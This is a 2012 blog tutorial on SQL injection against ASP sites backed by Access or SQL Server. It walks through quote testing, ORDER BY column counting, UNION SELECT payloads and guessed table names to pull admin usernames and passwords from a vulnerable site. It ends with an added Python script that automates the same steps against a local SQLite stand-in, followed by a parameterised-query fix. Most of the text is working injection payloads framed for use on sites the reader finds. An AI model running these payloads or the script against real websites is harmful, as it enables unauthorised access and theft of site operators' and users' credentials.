Sunday, September 16, 2012

MsSQL Structured Query Language Injection



Tutorial provided by





SQL injection on ASP pages works the same way as on PHP pages, with a few differences in syntax, mainly because the back end is usually Microsoft Access or SQL Server rather than MySQL.

First find a site that is vulnerable and runs on .asp pages. Assume the site is

Code:
http://www.target.com/

Now find a page where the site is vulnerable to SQL injection.

You can test a parameter by adding a single quote ' to the end of the URL, like


Code:
http://www.target.com/product.asp?id=13'

If you get an error like this:


Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'department_id=1024''.

/deptdet.asp, line 122

then the parameter is injectable. Read the error carefully: the driver name tells you which database you are talking to. This message comes from the ODBC Microsoft Access Driver, so the back end is Access (Jet), not SQL Server; a SQL Server back end reports [Microsoft][ODBC SQL Server Driver][SQL Server] instead. Next we find the number of columns the page's query returns. The examples below end each injected string with #, which is the terminator this tutorial uses; be aware that neither Access nor SQL Server treats # as a comment. If the trailing text itself causes an error on your target, end the string with -- on SQL Server (which also accepts /* */), or with a null byte (%00) on Access, which has no comment syntax at all.

Code:
http://www.target.com/product.asp?id=13 order by 1#

Suppose the page's query selects 10 columns. With "order by 1#" (without the double quotes) you get no error and the page loads normally, and the same holds for every value up to "order by 10#", but "order by 11#" produces an error because there is no eleventh column to sort on. That is how we know the query has 10 columns.

So we will have an error on this query


Code:
http://www.target.com/product.asp?id=13 order by 11#

But when we will use this query, we will not get any error


Code:
http://www.target.com/product.asp?id=13 order by 10#

This tells us that the page's query returns 10 columns, so our UNION must also select exactly 10 values.

Now build a UNION query with one numeric marker per column:


Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#

In the next step we need to know which of those column positions the page actually displays. In a simple injection (for example against MySQL) "union select 1,2,3,4,5,6 --" works on its own, and the marker numbers that show up on the page tell us which positions are visible. Access, however, requires a FROM clause in every SELECT, so the UNION above errors out until we add a table name after the markers.

Access does not expose information_schema the way SQL Server does, and its MSysObjects system table is usually not readable by the web application's account, so scripts that enumerate table names mostly fail against it; instead we guess. Common table names are admin, tbladmin, tbl_admin, user, users, login, info and email. Suppose the table admin exists. The URL becomes:

Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#

If the table name is right, the page loads and prints some of the marker numbers in place of the product data; those positions are the visible columns. Suppose 3, 6 and 7 are visible.

We will use position 3. Replace the 3 with a column name from the admin table (guessed as well, since Access gives us no way to list columns) and the page prints that column's values, which is how we read the username and password:

Now our URL will look like


Code:
http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#

Suppose the username now appears where the 3 was.

Then swap in the password column's name (here guessed as passwords) and the page prints the password.
The URL will be:


Code:
http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#
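The whole procedure above (quote test, ORDER BY column count, UNION markers with a FROM clause, then swapping a marker for a column name), automated as an added example that is not part of the original tutorial. It cannot reach a real ASP page offline, so it stands in an in-memory SQLite database for the site's back end and a Python function for the vulnerable product.asp page, both constructed here; the table and column names (products, admin, name, passwords), the sample rows and the three visible column positions are assumptions chosen to match the tutorial. SQLite ends a comment with --, so the payloads use -- rather than #; the probing logic is the same for SQL Server, and for Access you would switch the terminator to a null byte and keep the FROM clause.

```python
import sqlite3

# Constructed stand-in for the target site's database (assumption: SQLite in
# memory instead of the Access/SQL Server back end a real ASP site would use).
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (
            id INTEGER, name TEXT, descr TEXT, price REAL, sku TEXT,
            weight REAL, colour TEXT, stock INTEGER, vendor TEXT, added TEXT);
        INSERT INTO products VALUES
            (13, 'Widget', 'A widget', 9.99, 'W-13', 0.5, 'red', 7, 'ACME', '2012-09-16');
        CREATE TABLE admin (id INTEGER, name TEXT, passwords TEXT);
        INSERT INTO admin VALUES (1, 'administrator', 's3cret');
    """)
    return db

# Which of the ten query columns the page template prints (0-based); in SQL
# terms positions 3, 6 and 7, matching the tutorial's "3, 6 and 7 are visible".
VISIBLE = (2, 5, 6)

# SQLite's comment terminator. " --" works on SQL Server too; Access has no
# comment syntax, so there you would end the string with a null byte instead.
COMMENT = " --"

def vulnerable_page(db, id_param):
    """Stand-in for product.asp: the id parameter is pasted straight into the
    query, which is the bug the tutorial exploits. Returns the cells the page
    would render, or raises sqlite3.Error the way the ASP page shows an ODBC error."""
    sql = "SELECT * FROM products WHERE id=" + id_param
    rows = db.execute(sql).fetchall()
    return [[str(row[i]) for i in VISIBLE] for row in rows]

def page_errors(db, payload):
    """Step 1: does this parameter value make the page throw a database error?"""
    try:
        vulnerable_page(db, payload)
        return False
    except sqlite3.Error:
        return True

def count_columns(db, base="13", limit=50):
    """Step 2: ORDER BY probing. The largest n that does not error is the
    number of columns the page's query returns."""
    ncols = 0
    for n in range(1, limit + 1):
        if page_errors(db, f"{base} order by {n}{COMMENT}"):
            break
        ncols = n
    return ncols

def find_visible_columns(db, ncols, table, base="-13"):
    """Step 3: UNION SELECT with numeric markers. Returns {SQL position: slot
    in the rendered output} for every marker the page prints. A non-matching
    id (-13) keeps the real product row off the page so only our row renders;
    the FROM clause is kept because Access refuses a SELECT without one."""
    markers = ",".join(str(n) for n in range(1, ncols + 1))
    rendered = vulnerable_page(db, f"{base} union select {markers} from {table}{COMMENT}")
    row = rendered[0]
    return {int(cell): slot for slot, cell in enumerate(row)
            if cell.isdigit() and 1 <= int(cell) <= ncols}

def dump_column(db, ncols, visible, position, column, table, base="-13"):
    """Step 4: swap one visible marker for a column name and read back what the
    page prints in that slot, one entry per row of the named table."""
    select_list = [str(n) for n in range(1, ncols + 1)]
    select_list[position - 1] = column
    payload = f"{base} union select {','.join(select_list)} from {table}{COMMENT}"
    return [row[visible[position]] for row in vulnerable_page(db, payload)]

def safe_page(db, id_param):
    """The fix: bind id as a parameter. The same payloads are then just a
    string that matches no product, with no error and no UNION."""
    rows = db.execute("SELECT * FROM products WHERE id=?", (id_param,)).fetchall()
    return [[str(row[i]) for i in VISIBLE] for row in rows]

if __name__ == "__main__":
    db = build_db()
    print("quote test errors:", page_errors(db, "13'"))
    ncols = count_columns(db)
    visible = find_visible_columns(db, ncols, "admin")
    print("columns:", ncols, "visible:", visible)
    print("name:", dump_column(db, ncols, visible, 3, "name", "admin"))
    print("passwords:", dump_column(db, ncols, visible, 3, "passwords", "admin"))
    print("parameterised:", safe_page(db, "13 union select 1,2,3,4,5,6,7,8,9,10 from admin --"))
```

Two details worth copying into manual testing: use an id that matches nothing (id=-13 or id=13 and 1=2) for the UNION steps, so the markers are not mixed with real product data, and treat a marker check as reliable only when the digit shows up where the page normally prints content. The safe_page function shows why parameter binding (ADODB.Command with parameters on classic ASP) closes the hole: the injected text is compared as a value, never parsed as SQL.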
